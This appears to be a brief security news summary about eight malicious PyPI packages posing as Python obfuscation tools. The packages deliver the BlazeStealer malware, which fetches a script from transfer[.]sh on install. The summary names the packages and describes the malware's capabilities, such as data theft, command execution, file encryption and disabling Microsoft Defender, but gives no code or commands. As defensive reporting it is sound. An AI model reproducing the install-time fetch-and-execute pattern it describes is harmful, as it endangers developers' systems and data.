November 8, 2023 at 08:27AM
A set of malicious Python packages, disguised as obfuscation tools, have been discovered on the Python Package Index (PyPI) repository. The packages contain a malware called BlazeStealer, which allows attackers to gain control over compromised systems. The campaign began in January 2023 and includes eight packages. The malware can steal sensitive information, execute commands, encrypt files, and even render the computer unusable. Developers are urged to be cautious and carefully vet packages before use.
Key Takeaways:
– Malicious Python packages have been discovered on the Python Package Index (PyPI) repository.
– The packages masquerade as obfuscation tools but contain a malware called BlazeStealer.
– BlazeStealer retrieves a malicious script from an external source, enabling attackers to gain complete control over a victim’s computer.
– The campaign started in January 2023 and includes eight packages named Pyobftoexe, Pyobfusfile, Pyobfexecute, Pyobfpremium, Pyobflite, Pyobfadvance, Pyobfuse, and pyobfgood.
– These packages retrieve a Python script hosted on transfer[.]sh and execute it upon installation.
– BlazeStealer allows threat actors to harvest sensitive information, execute commands, encrypt files, and deactivate Microsoft Defender Antivirus.
– It can also render a computer unusable by increasing CPU usage, shutting down the machine, or causing a blue screen of death (BSoD) error.
– Downloads of the rogue packages were mostly from the U.S., followed by China, Russia, Ireland, Hong Kong, Croatia, France, and Spain.
– Developers are advised to remain vigilant and vet packages before consumption in the open-source domain.